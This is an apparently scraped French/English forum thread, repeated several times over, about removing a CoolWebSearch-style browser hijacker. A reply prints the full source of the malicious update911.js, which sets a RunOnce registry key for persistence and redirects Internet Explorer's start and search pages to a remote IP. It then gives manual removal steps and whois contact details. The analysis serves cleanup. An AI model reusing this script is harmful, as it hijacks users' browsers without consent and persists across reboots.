L'outil CoolWebShredder v1.06.exe a diagnostiqué CWS svcinit et CWS loadbat L'éradication avec cet outil n'a pas suffit. J'ai effacé manuellement un fichier script Java nommé update911.js
Merci pour votre aide
Je n'arrive pas à me débarasser d'un "truc" qui me repositionne la page de
démarrage d'IE à la valeur http://81.211.105.9/index.php?v=1
J'ai effacé les cookies sans succès. Pas de virus détecté par KAV mis à jour tous les jours Ad-aware et SpyBot ne détectent rien.
L'outil CoolWebShredder v1.06.exe a diagnostiqué CWS svcinit et CWS loadbat
L'éradication avec cet outil n'a pas suffit. J'ai effacé manuellement un
fichier script Java
nommé update911.js
Merci pour votre aide
Je n'arrive pas à me débarasser d'un "truc" qui me repositionne la
page de
démarrage d'IE à la valeur
http://81.211.105.9/index.php?v=1
J'ai effacé les cookies sans succès.
Pas de virus détecté par KAV mis à jour tous les jours
Ad-aware et SpyBot ne détectent rien.
L'outil CoolWebShredder v1.06.exe a diagnostiqué CWS svcinit et CWS loadbat L'éradication avec cet outil n'a pas suffit. J'ai effacé manuellement un fichier script Java nommé update911.js
Merci pour votre aide
Je n'arrive pas à me débarasser d'un "truc" qui me repositionne la page de
démarrage d'IE à la valeur http://81.211.105.9/index.php?v=1
J'ai effacé les cookies sans succès. Pas de virus détecté par KAV mis à jour tous les jours Ad-aware et SpyBot ne détectent rien.
Johannes25
It directs to SUPER SEARCH page on IP Number 81.211.105.9 (Apache 1.3.28 Unix PHP 4.3.3)
This is a copy of http://www.coolwebsearch.com DO NOT TRY THE FILE IN THE CONTACT PAGE (CLEANER.EXE)
A file called update911.js will be in your Windows Directory Contents: var url = "http://81.211.105.9/index.php?v=1"; var burl = "http://81.211.105.9/search.php?v=1"; var fso = new ActiveXObject("Scripting.FileSystemObject"); var tfolder = fso.GetSpecialFolder(0); var filepath = tfolder + "update911.js"; var Shell = new ActiveXObject("WScript.Shell"); Shell.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionRunOncetlc",filepath); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page",url); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page",url); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainSearch Bar",burl); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainUse Search Asst","no"); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainUse Custom Search URL",1,"REG_DWORD");
Every time you restart your computer it will be back because it is called from runonce in your registry.
1. Open regedit (Start/Run/Regedit.exe) 2. Search for "update911.js" and delete the key(s) 3. Search for "http://81.211.105.9/index.php?v=1"and delete the key(s) 4. Delete the file update911.js in your windows directory
RIPE Database info on IP number: inetnum: 81.211.105.0 - 81.211.105.255 netname: SOVINTEL-ICSTM2 descr: ICS TM, JSC descr: 70 Bolshoy pr. V.O. descr: 199002 St.-Petersburg country: RU admin-c: PSA13-RIPE tech-c: PSA13-RIPE status: ASSIGNED PA notify: mnt-by: SOVINTEL-MNT changed: 20031203 source: RIPE
person: Prasolov S A address: ICS TM address: 70 Bolshoy pr. V.O. address: 199002 St.-Petersburg address: Russia phone: +7 812 3291492 fax-no: +7 812 3222242 e-mail: nic-hdl: PSA13-RIPE notify: mnt-by: SOVINTEL-MNT changed: 20031203 source: RIPE
It directs to SUPER SEARCH page on IP Number 81.211.105.9 (Apache
1.3.28 Unix PHP 4.3.3)
This is a copy of http://www.coolwebsearch.com
DO NOT TRY THE FILE IN THE CONTACT PAGE (CLEANER.EXE)
A file called update911.js will be in your Windows Directory
Contents:
var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\tlc",filepath);
Shell.RegWrite("HKCU\Software\Microsoft\Internet
Explorer\Main\Start Page",url);
Shell.RegWrite("HKCU\Software\Microsoft\Internet
Explorer\Main\Search Page",url);
Shell.RegWrite("HKCU\Software\Microsoft\Internet
Explorer\Main\Search Bar",burl);
Shell.RegWrite("HKCU\Software\Microsoft\Internet
Explorer\Main\Use Search Asst","no");
Shell.RegWrite("HKCU\Software\Microsoft\Internet
Explorer\Main\Use Custom Search URL",1,"REG_DWORD");
Every time you restart your computer it will be back because it is
called from runonce in your registry.
1. Open regedit (Start/Run/Regedit.exe)
2. Search for "update911.js" and delete the key(s)
3. Search for "http://81.211.105.9/index.php?v=1"and delete the key(s)
4. Delete the file update911.js in your windows directory
RIPE Database info on IP number:
inetnum: 81.211.105.0 - 81.211.105.255
netname: SOVINTEL-ICSTM2
descr: ICS TM, JSC
descr: 70 Bolshoy pr. V.O.
descr: 199002 St.-Petersburg
country: RU
admin-c: PSA13-RIPE
tech-c: PSA13-RIPE
status: ASSIGNED PA
notify: dnsmaster@ilca.ru
mnt-by: SOVINTEL-MNT
changed: marty@sovintel.ru 20031203
source: RIPE
It directs to SUPER SEARCH page on IP Number 81.211.105.9 (Apache 1.3.28 Unix PHP 4.3.3)
This is a copy of http://www.coolwebsearch.com DO NOT TRY THE FILE IN THE CONTACT PAGE (CLEANER.EXE)
A file called update911.js will be in your Windows Directory Contents: var url = "http://81.211.105.9/index.php?v=1"; var burl = "http://81.211.105.9/search.php?v=1"; var fso = new ActiveXObject("Scripting.FileSystemObject"); var tfolder = fso.GetSpecialFolder(0); var filepath = tfolder + "update911.js"; var Shell = new ActiveXObject("WScript.Shell"); Shell.RegWrite("HKLMSoftwareMicrosoftWindowsCurrentVersionRunOncetlc",filepath); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page",url); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainSearch Page",url); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainSearch Bar",burl); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainUse Search Asst","no"); Shell.RegWrite("HKCUSoftwareMicrosoftInternet ExplorerMainUse Custom Search URL",1,"REG_DWORD");
Every time you restart your computer it will be back because it is called from runonce in your registry.
1. Open regedit (Start/Run/Regedit.exe) 2. Search for "update911.js" and delete the key(s) 3. Search for "http://81.211.105.9/index.php?v=1"and delete the key(s) 4. Delete the file update911.js in your windows directory
RIPE Database info on IP number: inetnum: 81.211.105.0 - 81.211.105.255 netname: SOVINTEL-ICSTM2 descr: ICS TM, JSC descr: 70 Bolshoy pr. V.O. descr: 199002 St.-Petersburg country: RU admin-c: PSA13-RIPE tech-c: PSA13-RIPE status: ASSIGNED PA notify: mnt-by: SOVINTEL-MNT changed: 20031203 source: RIPE
